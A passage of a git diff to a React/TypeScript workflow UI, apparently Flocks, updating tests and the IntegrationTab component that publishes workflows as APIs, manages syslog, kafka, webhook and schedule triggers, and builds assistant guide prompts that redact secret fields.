+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"delete": "DELETE /api/workflow/wf-1/service"'),
+      'Flocks辅助配置：API 发布配置',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('不要继续询问用户要对 workflow.json 模板触发器做什么'),
+      'Flocks辅助配置：API 发布配置',
+    );
+    expect(screen.getByText('触发能力')).toBeInTheDocument();
+    const triggerCard = screen.getByTestId('trigger-card-syslog-default');
+    expect(within(triggerCard).getByText('Syslog Listener')).toBeInTheDocument();
+    expect(within(triggerCard).queryByText('Inputs（JSON）')).not.toBeInTheDocument();
+    await user.click(within(triggerCard).getByRole('button', { name: '配置' }));
+    expect(within(triggerCard).getByText('Inputs（JSON）')).toBeInTheDocument();
+    expect(within(triggerCard).getByText('Flocks辅助配置')).toBeInTheDocument();
+    await user.click(within(triggerCard).getByRole('button', { name: '辅助配置' }));
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"id": "syslog-default"'),
+      'Flocks辅助配置：Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"triggerType": "syslog"'),
+      'Flocks辅助配置：Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"update": "PUT /api/workflow/wf-1/triggers/syslog-default"'),
+      'Flocks辅助配置：Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('后端配置库或运行态接口不可达，请停止配置流程'),
+      'Flocks辅助配置：Syslog 接入',
+    );
+    const triggerPrompt = onGuidePrompt.mock.calls.find(
+      ([, label]) => label === 'Flocks辅助配置：Syslog 接入',
+    )?.[0] as string | undefined;
+    expect(triggerPrompt).toContain('"apiKeyConfigured": true');
+    expect(triggerPrompt).toContain('"headerName": "X-Api-Key"');
+    expect(triggerPrompt).not.toContain('super-secret-api-key');
+    expect(triggerPrompt).not.toContain('"apiKey":');
+    expect(within(triggerCard).getByRole('button', { name: '删除 Syslog Listener' })).toBeInTheDocument();
+    expect(screen.queryByText('当前工作流还没有发布或配置接入方式。')).not.toBeInTheDocument();
+
+    await user.click(within(triggerCard).getByRole('button', { name: '删除 Syslog Listener' }));
 
-    expect(await screen.findByText('Kafka Trigger')).toBeInTheDocument();
-    expect(screen.getAllByRole('button', { name: '删除' })).toHaveLength(1);
-  });
-
-  it('creates a webhook trigger from the unified toolbar', async () => {
-    const user = userEvent.setup();
-
-    render(<IntegrationTab workflow={workflow} />);
+    await waitFor(() => {
+      expect(workflowAPI.deleteTrigger).toHaveBeenCalledWith('wf-1', 'syslog-default');
+    });
 
-    await user.click(await screen.findByRole('button', { name: 'Webhook' }));
+    await user.click(within(apiCard).getByRole('button', { name: '删除 API 发布配置' }));
 
     await waitFor(() => {
-      expect(workflowAPI.createTrigger).toHaveBeenCalledWith(
-        'wf-1',
-        expect.objectContaining({
-          type: 'custom_webhook',
-          name: 'Webhook Trigger',
-          enabled: false,
-        }),
-      );
+      expect(workflowAPI.deleteService).toHaveBeenCalledWith('wf-1');
     });
+    expect(within(screen.getByTestId('api-publish-card')).getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(within(screen.getByTestId('api-publish-card')).queryByRole('button', { name: '删除 API 发布配置' })).not.toBeInTheDocument();
   });
 
-  it('saves edited schedule trigger through the unified editor', async () => {
+  it('allows changing the runtime driver after API publish', async () => {
     const user = userEvent.setup();
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'schedule-1',
-            name: 'Daily Scan',
-            type: 'schedule',
-            enabled: true,
-            source: { mode: 'interval', intervalSeconds: 60 },
-            runtime: { timeoutSeconds: 7200, noOverlap: true },
-            mapping: {},
-            inputs: {},
-            testSamples: [{ name: 'default', payload: {} }],
-          },
-          status: { state: 'running' },
-        },
-      ],
+    const service = {
+      workflowId: 'wf-1',
+      workflowName: 'Demo Workflow',
+      serviceUrl: 'http://127.0.0.1:8080',
+      invokeUrl: 'http://127.0.0.1:8080/invoke',
+      apiKey: 'secret',
+      status: 'running' as const,
+      publishedAt: Date.now(),
+      driver: 'local' as const,
+    };
+    workflowAPI.getService.mockResolvedValue({ data: service });
+    workflowAPI.publish.mockResolvedValueOnce({
+      data: {
+        ...service,
+        serviceUrl: 'http://127.0.0.1:19000',
+        invokeUrl: 'http://127.0.0.1:19000/invoke',
+        driver: 'docker',
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={vi.fn()} />);
+
+    const apiCard = await screen.findByTestId('api-publish-card');
+    await user.click(within(apiCard).getByRole('button', { name: '配置' }));
+    await user.click(within(apiCard).getByRole('button', { name: 'Docker 容器' }));
+    expect(within(apiCard).getByRole('button', { name: '应用运行方式' })).toBeInTheDocument();
+
+    await user.click(within(apiCard).getByRole('button', { name: '应用运行方式' }));
 
-    const nameInput = await screen.findByDisplayValue('Daily Scan');
-    fireEvent.change(nameInput, { target: { value: 'Updated Scan' } });
     await waitFor(() => {
-      expect(nameInput).toHaveValue('Updated Scan');
+      expect(workflowAPI.publish).toHaveBeenCalledWith('wf-1', { driver: 'docker' });
     });
-    await user.click(screen.getByRole('button', { name: '保存' }));
-
     await waitFor(() => {
-      expect(workflowAPI.updateTrigger).toHaveBeenCalledWith(
-        'wf-1',
-        'schedule-1',
-        expect.objectContaining({
-          id: 'schedule-1',
-          type: 'schedule',
-          name: 'Updated Scan',
-        }),
-      );
+      expect(within(apiCard).queryByRole('button', { name: '应用运行方式' })).not.toBeInTheDocument();
     });
+    expect(within(apiCard).getByText('http://127.0.0.1:19000/invoke')).toBeInTheDocument();
   });
 
-  it('persists the current inputs JSON text instead of stale draft data', async () => {
+  it('lets stopping supersede an in-flight driver switch publish', async () => {
     const user = userEvent.setup();
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'hook-1',
-            name: 'Webhook Trigger',
-            type: 'custom_webhook',
-            enabled: true,
-            source: { method: 'POST', path: '/demo' },
-            auth: { type: 'none' },
-            mapping: { event: '$.body' },
-            inputs: { original: true },
-            testSamples: [{ name: 'default', payload: { example: true } }],
-          },
-          status: { state: 'ready' },
-        },
-      ],
+    const service = {
+      workflowId: 'wf-1',
+      workflowName: 'Demo Workflow',
+      serviceUrl: 'http://127.0.0.1:8080',
+      invokeUrl: 'http://127.0.0.1:8080/invoke',
+      apiKey: 'secret',
+      status: 'running' as const,
+      publishedAt: Date.now(),
+      driver: 'local' as const,
+    };
+    const stoppedService = {
+      ...service,
+      status: 'stopped' as const,
+      stoppedAt: Date.now(),
+    };
+    let resolvePublish!: (value: { data: Record<string, unknown> }) => void;
+    const pendingPublish = new Promise<{ data: Record<string, unknown> }>((resolve) => {
+      resolvePublish = resolve;
     });
 
-    render(<IntegrationTab workflow={workflow} />);
+    workflowAPI.getService
+      .mockResolvedValueOnce({ data: service })
+      .mockResolvedValueOnce({ data: stoppedService });
+    workflowAPI.publish.mockReturnValueOnce(pendingPublish);
+
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={vi.fn()} />);
+
+    const apiCard = await screen.findByTestId('api-publish-card');
+    await user.click(within(apiCard).getByRole('button', { name: '配置' }));
+    await user.click(within(apiCard).getByRole('button', { name: 'Docker 容器' }));
+    await user.click(within(apiCard).getByRole('button', { name: '应用运行方式' }));
+    expect(within(apiCard).getByRole('button', { name: '发布中，请稍候...' })).toBeInTheDocument();
+
+    await user.click(within(apiCard).getByRole('button', { name: '停用' }));
 
-    await screen.findByText('Inputs（JSON）');
-    const inputsEditor = getFieldTextarea('Inputs（JSON）');
-    fireEvent.change(inputsEditor, { target: { value: '{\n  "fresh": true\n}' } });
-    await user.click(screen.getByRole('button', { name: '保存' }));
+    await waitFor(() => {
+      expect(workflowAPI.unpublish).toHaveBeenCalledWith('wf-1');
+    });
+    await waitFor(() => {
+      expect(within(apiCard).getByRole('button', { name: '启用' })).toBeInTheDocument();
+    });
+    expect(within(apiCard).queryByRole('button', { name: '发布中，请稍候...' })).not.toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: 'Docker 容器' })).toBeEnabled();
+
+    resolvePublish({
+      data: {
+        ...service,
+        serviceUrl: 'http://127.0.0.1:19000',
+        invokeUrl: 'http://127.0.0.1:19000/invoke',
+        driver: 'docker',
+      },
+    });
 
     await waitFor(() => {
-      expect(workflowAPI.updateTrigger).toHaveBeenCalledWith(
-        'wf-1',
-        'hook-1',
-        expect.objectContaining({
-          inputs: { fresh: true },
-        }),
-      );
+      expect(within(apiCard).getByRole('button', { name: '启用' })).toBeInTheDocument();
     });
+    expect(within(apiCard).queryByText('http://127.0.0.1:19000/invoke')).not.toBeInTheDocument();
   });
 
-  it('disables creating a second schedule trigger', async () => {
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'schedule-1',
-            name: 'Daily Scan',
-            type: 'schedule',
-            enabled: true,
-            source: { mode: 'interval', intervalSeconds: 60 },
-            mapping: {},
-            inputs: {},
-            testSamples: [{ name: 'default', payload: {} }],
-          },
-          status: { state: 'running' },
+  it('keeps template-only triggers out of runtime cards while preserving publish controls', async () => {
+    workflowAPI.getConfig.mockResolvedValue({
+      data: {
+        exists: true,
+        path: '/tmp/config.json',
+        config: {
+          version: 1,
+          kind: 'workflow.integration-config',
+          workflow: { id: 'wf-1' },
+          updatedAt: Date.now(),
+          publish: { type: 'api_service', driver: 'local' },
+          triggers: [
+            {
+              id: 'syslog-template',
+              type: 'syslog',
+              name: 'Syslog Template',
+              source: { protocol: 'udp', host: '0.0.0.0', port: 5514 },
+            },
+          ],
         },
-      ],
+        runtime: {
+          publish: { type: 'api_service', enabled: false, status: 'stopped' },
+          triggers: [],
+        },
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
-
-    expect(await screen.findByRole('button', { name: 'Schedule' })).toBeDisabled();
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={vi.fn()} />);
+
+    const apiCard = await screen.findByTestId('api-publish-card');
+    const guideActions = screen.getByTestId('publish-guide-actions-inline');
+    expect(screen.getByText('Rex 辅助发布')).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /^发布为 API$/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Syslog 接入/ })).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(screen.getByText('触发能力')).toBeInTheDocument();
+    expect(screen.getByText('还没有配置任何 Trigger。可以从上面的快捷按钮开始。')).toBeInTheDocument();
+    expect(screen.queryByText('Syslog Template')).not.toBeInTheDocument();
   });
 
-  it('toggles trigger enabled state from the trigger list', async () => {
-    const user = userEvent.setup();
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'hook-1',
-            name: 'Webhook Trigger',
-            type: 'custom_webhook',
-            enabled: false,
-            source: { method: 'POST', path: '/demo' },
-            auth: { type: 'none' },
-            mapping: { event: '$.body' },
-            inputs: {},
-            testSamples: [{ name: 'default', payload: { example: true } }],
-          },
-          status: { state: 'stopped' },
+  it('shows default publish controls when config declares no publish capability', async () => {
+    workflowAPI.getConfig.mockResolvedValue({
+      data: {
+        exists: true,
+        path: '/tmp/config.json',
+        config: {
+          version: 1,
+          kind: 'workflow.integration-config',
+          workflow: { id: 'wf-1' },
+          updatedAt: Date.now(),
+          triggers: [],
         },
-        {
-          trigger: {
-            id: 'hook-2',
-            name: 'Webhook Trigger 2',
-            type: 'custom_webhook',
-            enabled: true,
-            source: { method: 'POST', path: '/demo-2' },
-            auth: { type: 'none' },
-            mapping: { event: '$.body' },
-            inputs: {},
-            testSamples: [{ name: 'default', payload: { example: true } }],
-          },
-          status: { state: 'ready' },
-        },
-      ],
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
-
-    await user.click((await screen.findAllByRole('button', { name: '启用' }))[0]);
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={vi.fn()} />);
 
-    await waitFor(() => {
-      expect(workflowAPI.updateTrigger).toHaveBeenCalledWith(
-        'wf-1',
-        'hook-1',
-        expect.objectContaining({ enabled: true }),
-      );
-    });
+    const apiCard = await screen.findByTestId('api-publish-card');
+    const guideActions = screen.getByTestId('publish-guide-actions-inline');
+    expect(screen.getByText('Rex 辅助发布')).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /发布为 API/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Webhook 接入/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /定时触发/ })).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(screen.getByText('触发能力')).toBeInTheDocument();
   });
 
-  it('runs schedule trigger once from the editor', async () => {
+  it('offers publish guide actions and routes the selected guide prompt', async () => {
     const user = userEvent.setup();
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'schedule-1',
-            name: 'Daily Scan',
-            type: 'schedule',
+    const onGuidePrompt = vi.fn();
+    const service = {
+      workflowId: 'wf-1',
+      workflowName: 'Demo Workflow',
+      serviceUrl: 'http://127.0.0.1:8080',
+      invokeUrl: 'http://127.0.0.1:8080/invoke',
+      apiKey: 'secret',
+      status: 'running' as const,
+      publishedAt: Date.now(),
+      driver: 'local' as const,
+    };
+    const triggerRecords = [
+      {
+        trigger: {
+          id: 'syslog-default',
+          type: 'syslog' as const,
+          name: 'Syslog Listener',
+          source: { protocol: 'udp', host: '0.0.0.0', port: 5514 },
+        },
+        status: { state: 'stopped' },
+      },
+      {
+        trigger: {
+          id: 'kafka-default',
+          type: 'kafka' as const,
+          name: 'Kafka Consumer',
+          source: { inputBroker: 'localhost:9092', inputTopic: 'alerts' },
+        },
+        status: { state: 'stopped' },
+      },
+    ];
+    workflowAPI.getService.mockResolvedValue({ data: service });
+    workflowAPI.getTriggers.mockResolvedValue({ data: triggerRecords });
+    workflowAPI.getConfig.mockResolvedValue({
+      data: {
+        exists: true,
+        path: '/tmp/config.json',
+        config: {
+          version: 1,
+          kind: 'workflow.integration-config',
+          workflow: { id: 'wf-1' },
+          updatedAt: Date.now(),
+          publish: { type: 'api_service', driver: 'local' },
+          triggers: [
+            {
+              id: 'syslog-default',
+              type: 'syslog',
+              name: 'Syslog Listener',
+              source: { protocol: 'udp', host: '0.0.0.0', port: 5514 },
+            },
+            {
+              id: 'kafka-default',
+              type: 'kafka',
+              name: 'Kafka Consumer',
+              source: { inputBroker: 'localhost:9092', inputTopic: 'alerts' },
+            },
+          ],
+        },
+        runtime: {
+          publish: {
+            type: 'api_service',
             enabled: true,
-            source: { mode: 'interval', intervalSeconds: 60 },
-            runtime: { timeoutSeconds: 7200, noOverlap: true },
-            mapping: {},
-            inputs: {},
-            testSamples: [{ name: 'default', payload: {} }],
+            status: 'running',
+            driver: 'local',
+            invokeUrl: 'http://127.0.0.1:8080/invoke',
+            apiKeyConfigured: true,
+            publishedAt: service.publishedAt,
           },
-          status: { state: 'running' },
+          triggers: triggerRecords,
         },
-      ],
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
-
-    await user.click(await screen.findByRole('button', { name: '立即执行一轮' }));
-
-    await waitFor(() => {
-      expect(workflowAPI.runPollerOnce).toHaveBeenCalledWith('wf-1');
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={onGuidePrompt} />);
+
+    expect((await screen.findAllByRole('button', { name: /^发布为 API$/ })).length).toBeGreaterThan(0);
+    expect(screen.getAllByRole('button', { name: /Syslog 接入/ }).length).toBeGreaterThan(0);
+    expect(screen.getAllByRole('button', { name: /Kafka 接入/ }).length).toBeGreaterThan(0);
+    expect(screen.getAllByRole('button', { name: /Webhook 接入/ }).length).toBeGreaterThan(0);
+    expect(screen.getAllByRole('button', { name: /定时触发/ }).length).toBeGreaterThan(0);
+    expect(screen.getAllByText('Rex 辅助发布')).toHaveLength(1);
+    expect(screen.getAllByTestId('publish-guide-actions-inline')).toHaveLength(1);
+    screen.getAllByTestId('publish-guide-actions-inline').forEach((group) => {
+      expect(group).toHaveClass('flex-wrap');
+      expect(group).not.toHaveClass('overflow-x-auto');
     });
+
+    await user.click(screen.getAllByRole('button', { name: /Syslog 接入/ })[0]);
+
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('用户点击了「Syslog 接入」按钮'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('guide.md'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('必须调用 question 工具'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('/api/workflow/wf-1/config'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('DELETE /api/workflow/wf-1/triggers/{triggerId}'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('config.json 和 workflow.json 不是直接写入目标'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('server_api_token'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('Authorization: Bearer'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('后端接口不可用时必须停止配置流程'),
+      'Syslog 接入',
+    );
   });
 
   it('deletes selected trigger from the workspace', async () => {
diff --git a/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.tsx b/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.tsx
index 9cc1825d2..48646b4f9 100644
--- a/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.tsx
@@ -2,6 +2,7 @@ import {
   useState,
   useEffect,
   useCallback,
+  useRef,
   type InputHTMLAttributes,
   type ReactNode,
   type SelectHTMLAttributes,
@@ -13,16 +14,22 @@ import {
   Check,
   ChevronDown,
   ChevronRight,
+  Bot,
   Globe,
   Loader2,
+  Play,
+  Rocket,
   Server,
+  Square,
   Trash2,
   Workflow as WorkflowIcon,
 } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import {
   workflowAPI,
+  workflowAPIEndpoints,
   Workflow,
+  WorkflowIntegrationConfig,
   WorkflowService,
   WorkflowServiceDriver,
   WorkflowTrigger,
@@ -31,18 +38,459 @@ import {
   WorkflowTriggerType,
 } from '@/api/workflow';
 import CopyButton from '@/components/common/CopyButton';
+import GuideInfoIcon from '@/components/common/GuideInfoIcon';
 import WorkflowStatusBadge from '@/components/common/WorkflowStatusBadge';
 import { extractErrorMessage } from '@/utils/error';
 
 export interface IntegrationTabProps {
   workflow: Workflow;
   onWorkflowUpdated?: (updated: Workflow) => void;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
 }
 
 type JsonObject = Record<string, any>;
 
 const DEFAULT_JSON_TEXT = JSON.stringify({}, null, 2);
 const LEGACY_SINGLETON_TYPES: WorkflowTriggerType[] = ['schedule', 'kafka', 'syslog'];
+const TEMPLATE_API_MODES = new Set(['api', 'publish', 'api_service', 'service']);
+const DEFAULT_PUBLISH_GUIDE_KINDS = ['api', 'syslog', 'kafka', 'webhook', 'schedule'] as const;
+const CARD_ACTION_GRID_CLASS = 'grid w-full grid-cols-3 items-center gap-2 sm:w-[276px] sm:justify-self-end';
+const CARD_ACTION_BUTTON_CLASS = 'inline-flex h-8 w-full items-center justify-center gap-1.5 whitespace-nowrap rounded-lg border bg-white px-2 text-xs font-medium disabled:opacity-60';
+const CARD_ACTION_NEUTRAL_BUTTON_CLASS = `${CARD_ACTION_BUTTON_CLASS} border-gray-200 text-gray-700 hover:border-gray-300 hover:bg-gray-50`;
+const CARD_ACTION_DANGER_BUTTON_CLASS = `${CARD_ACTION_BUTTON_CLASS} border-red-200 text-red-600 hover:bg-red-50`;
+
+interface TemplateView {
+  hasApi: boolean;
+  triggers: WorkflowTrigger[];
+}
+
+interface PublishGuideAction {
+  key: string;
+  label: string;
+  description: string;
+  prompt: string;
+}
+
+interface CardGuideAction {
+  label: string;
+  description: string;
+  prompt: string;
+  displayLabel: string;
+}
+
+const WORKFLOW_CONFIG_SKILL_NAME = 'workflow-config-guide';
+const WORKFLOW_GUIDE_FILE_NAME = 'guide.md';
+
+type TranslateFn = (key: string, params?: Record<string, unknown>) => string;
+type WorkflowPromptParams = Record<string, unknown> & {
+  backendConfigAccessGuide: string;
+};
+
+function withBackendConfigAccessGuide(
+  t: TranslateFn,
+  params: Record<string, unknown>,
+): WorkflowPromptParams {
+  return {
+    ...params,
+    backendConfigAccessGuide: t('detail.chat.backendConfigAccessGuide', params),
+  };
+}
+
+function formatWorkflowAPIEndpoints(id: string, triggerId?: string): string {
+  return JSON.stringify(workflowAPIEndpoints(id, triggerId), null, 2);
+}
+
+function asObject(value: unknown): JsonObject {
+  return value && typeof value === 'object' && !Array.isArray(value) ? value as JsonObject : {};
+}
+
+function normalizeMode(value: unknown): string {
+  return String(value ?? '').trim().toLowerCase().replace(/[-\s]+/g, '_');
+}
+
+function templateModes(config?: WorkflowIntegrationConfig | null): Set<string> {
+  const modes = new Set<string>();
+  if (!config) return modes;
+  const raw = config as JsonObject;
+  const candidates = [
+    raw.mode,
+    raw.type,
+    ...(Array.isArray(raw.modes) ? raw.modes : []),
+    ...(Array.isArray(raw.capabilities) ? raw.capabilities : []),
+  ];
+  candidates.forEach((candidate) => {
+    const mode = normalizeMode(candidate);
+    if (mode) modes.add(mode);
+  });
+  return modes;
+}
+
+function templateHasApi(config?: WorkflowIntegrationConfig | null): boolean {
+  if (!config) return false;
+  const raw = config as JsonObject;
+  const publish = asObject(raw.publish ?? raw.api);
+  if (isTemplateApiMode(publish.type)) {
+    return true;
+  }
+  if (Object.keys(publish).length > 0 && publish.enabled !== false) {
+    return true;
+  }
+  if (templateTriggerEntries(config).some((item) => isTemplateApiMode((item as JsonObject).type))) {
+    return true;
+  }
+  const modes = templateModes(config);
+  return Array.from(modes).some((mode) => TEMPLATE_API_MODES.has(mode));
+}
+
+function templateTriggerEntries(config?: WorkflowIntegrationConfig | null): unknown[] {
+  if (!config) return [];
+  const raw = config as JsonObject;
+  return Array.isArray(raw.triggers) ? raw.triggers : Array.isArray(raw.integrations) ? raw.integrations : [];
+}
+
+function isTemplateApiMode(value: unknown): boolean {
+  return TEMPLATE_API_MODES.has(normalizeMode(value));
+}
+
+function templateTriggers(config?: WorkflowIntegrationConfig | null): WorkflowTrigger[] {
+  return templateTriggerEntries(config)
+    .filter((item): item is WorkflowTrigger => Boolean(item && typeof item === 'object' && (item as WorkflowTrigger).type))
+    .filter((item) => !isTemplateApiMode(item.type))
+    .map((item, index) => ({
+      ...item,
+      id: item.id || `${item.type}-${index + 1}`,
+    }));
+}
+
+function buildTemplateView(config?: WorkflowIntegrationConfig | null): TemplateView {
+  return {
+    hasApi: templateHasApi(config),
+    triggers: templateTriggers(config),
+  };
+}
+
+function workflowGuidePromptParams(workflow: Workflow) {
+  const dir = workflow.source === 'global'
+    ? `~/.flocks/plugins/workflows/${workflow.id}/`
+    : `.flocks/plugins/workflows/${workflow.id}/`;
+  const endpoints = workflowAPIEndpoints(workflow.id);
+  return {
+    id: workflow.id,
+    name: workflow.name,
+    dir,
+    mdPath: `${dir}workflow.md`,
+    guidePath: `${dir}${WORKFLOW_GUIDE_FILE_NAME}`,
+    configEndpoint: endpoints.config.read.replace(/^GET /, ''),
+    configSyncEndpoint: endpoints.config.syncFallback.replace(/^POST /, ''),
+    publishEndpoint: endpoints.apiService.publish.replace(/^POST /, ''),
+    unpublishEndpoint: endpoints.apiService.unpublish.replace(/^POST /, ''),
+    triggersEndpoint: endpoints.triggers.list.replace(/^GET /, ''),
+    apiEndpoints: formatWorkflowAPIEndpoints(workflow.id),
+    configSkillName: WORKFLOW_CONFIG_SKILL_NAME,
+  };
+}
+
+function buildGuideQuestionPrompt(
+  t: TranslateFn,
+  workflow: Workflow,
+  focus: string,
+  instruction: string,
+): string {
+  const promptParams = withBackendConfigAccessGuide(t, workflowGuidePromptParams(workflow));
+  return [
+    t('detail.chat.welcome.guideQuestionPrompt', {
+      ...promptParams,
+      focus,
+      instruction,
+    }),
+    promptParams.backendConfigAccessGuide,
+  ].join('\n\n');
+}
+
+function triggerGuideKind(type: WorkflowTriggerType): string {
+  if (type === 'custom_webhook') return 'webhook';
+  if (type === 'custom_adapter') return 'adapter';
+  return type;
+}
+
+function triggerGuideTranslationKey(kind: string, suffix: 'Short' | 'Desc' | 'Instruction'): string {
+  const normalized = kind.charAt(0).toUpperCase() + kind.slice(1);
+  return `detail.run.guide${normalized}${suffix}`;
+}
+
+function buildPublishGuideActions(t: TranslateFn, workflow: Workflow, view: TemplateView): PublishGuideAction[] {
+  const actions: PublishGuideAction[] = [];
+  const seen = new Set<string>();
+  const addApiAction = () => {
+    if (seen.has('api')) return;
+    seen.add('api');
+    const label = t('detail.run.guideApiShort');
+    actions.push({
+      key: 'api',
+      label,
+      description: t('detail.run.guideApiDesc'),
+      prompt: buildGuideQuestionPrompt(t, workflow, label, t('detail.run.guideApiInstruction')),
+    });
+  };
+  const addTriggerKindAction = (kind: string) => {
+    if (seen.has(kind)) return;
+    seen.add(kind);
+    const labelKey = triggerGuideTranslationKey(kind, 'Short');
+    const descriptionKey = triggerGuideTranslationKey(kind, 'Desc');
+    const instructionKey = triggerGuideTranslationKey(kind, 'Instruction');
+    const label = t(labelKey);
+    actions.push({
+      key: kind,
+      label,
+      description: t(descriptionKey),
+      prompt: buildGuideQuestionPrompt(t, workflow, label, t(instructionKey)),
+    });
+  };
+
+  DEFAULT_PUBLISH_GUIDE_KINDS.forEach((kind) => {
+    if (kind === 'api') {
+      addApiAction();
+      return;
+    }
+    addTriggerKindAction(kind);
+  });
+
+  view.triggers.forEach((trigger) => {
+    const kind = triggerGuideKind(trigger.type);
+    addTriggerKindAction(kind);
+  });
+
+  return actions;
+}
+
+function workflowGuideContext(workflow: Workflow): JsonObject {
+  return {
+    id: workflow.id,
+    name: workflow.name,
+    category: workflow.category,
+    source: workflow.source ?? 'project',
+    start: workflow.workflowJson.start,
+    nodeCount: workflow.workflowJson.nodes?.length ?? 0,
+    edgeCount: workflow.workflowJson.edges?.length ?? 0,
+    triggerCount: workflow.workflowJson.triggers?.length ?? 0,
+    sampleInputs: workflow.workflowJson.metadata?.sampleInputs ?? {},
+    outputSchema: workflow.workflowJson.metadata?.outputSchema ?? {},
+  };
+}
+
+function buildCardGuidePrompt(
+  t: TranslateFn,
+  workflow: Workflow,
+  focus: string,
+  instruction: string,
+  cardContext: JsonObject,
+): string {
+  return [
+    buildGuideQuestionPrompt(t, workflow, focus, instruction),
+    '',
+    '当前发布卡片上下文（来自 WebUI 当前状态，最终应用仍以后端配置库为准）：',
+    stringifyJson({
+      workflow: workflowGuideContext(workflow),
+      apiEndpoints: workflowAPIEndpoints(workflow.id, String(cardContext.trigger?.id ?? '{triggerId}')),
+      card: cardContext,
+    }),
+    '',
+    '请结合当前工作流的功能、guide.md、workflow.md、配置库和上面的卡片上下文进行引导。优先判断当前配置是否与工作流输入/输出契约匹配；如需用户补充信息，请使用 question 工具一次只问一个最关键问题；如需应用配置，先展示相对后端配置库的 diff 并确认。',
+    '重要边界：workflow.json/config.json 里的触发器只可作为模板或兜底迁移来源，不能当作已生效配置，也不能通过修改这些文件来表示配置已生效。已生效的 API/触发器配置必须来自后端配置库或当前卡片对应的运行态记录。',
+    '如果后端配置库或运行态接口不可达，请停止配置流程，明确说明无法读取/写入配置库且本次未应用、未发布、未启动；不要继续询问用户要对 workflow.json 模板触发器做什么，也不要在普通回复里问“你希望做什么操作”。',
+  ].join('\n');
+}
+
+function buildApiCardGuideAction(
+  t: TranslateFn,
+  workflow: Workflow,
+  service: WorkflowService | null,
+  selectedDriver: WorkflowServiceDriver,
+): CardGuideAction {
+  const focus = t('detail.run.cardGuideApiFocus');
+  return {
+    label: t('detail.run.cardGuideAction'),
+    description: t('detail.run.cardGuideApiDesc'),
+    displayLabel: t('detail.run.cardGuideDisplayLabel', { focus }),
+    prompt: buildCardGuidePrompt(t, workflow, focus, t('detail.run.guideApiInstruction'), {
+      capability: 'api_service',
+      selectedDriver,
+      service: service
+        ? {
+            status: service.status,
+            driver: service.driver,
+            serviceUrl: service.serviceUrl,
+            invokeUrl: service.invokeUrl,
+            apiKeyConfigured: Boolean(service.apiKey),
+            publishedAt: service.publishedAt,
+          }
+        : {
+            status: 'not_published',
+          },
+    }),
+  };
+}
+
+function sanitizeTriggerAuthForPrompt(auth?: WorkflowTrigger['auth']): JsonObject {
+  const sanitized: JsonObject = {
+    type: String(auth?.type ?? 'none'),
+  };
+  if (!auth) return sanitized;
+
+  Object.entries(auth).forEach(([key, value]) => {
+    const normalizedKey = key.toLowerCase().replace(/[^a-z0-9]/g, '');
+    if (key === 'type') return;
+    if (key === 'headerName' || key === 'queryParam') {
+      sanitized[key] = value;
+      return;
+    }
+    const isSecretLike = (
+      normalizedKey.includes('apikey')
+      || normalizedKey.includes('secret')
+      || normalizedKey.includes('token')
+      || normalizedKey.includes('password')
+      || normalizedKey.includes('signature')
+    );
+    if (isSecretLike) {
+      sanitized[`${key}Configured`] = Boolean(value);
+    }
+  });
+
+  return sanitized;
+}
+
+function buildTriggerCardGuideAction(
+  t: TranslateFn,
+  workflow: Workflow,
+  trigger: WorkflowTrigger,
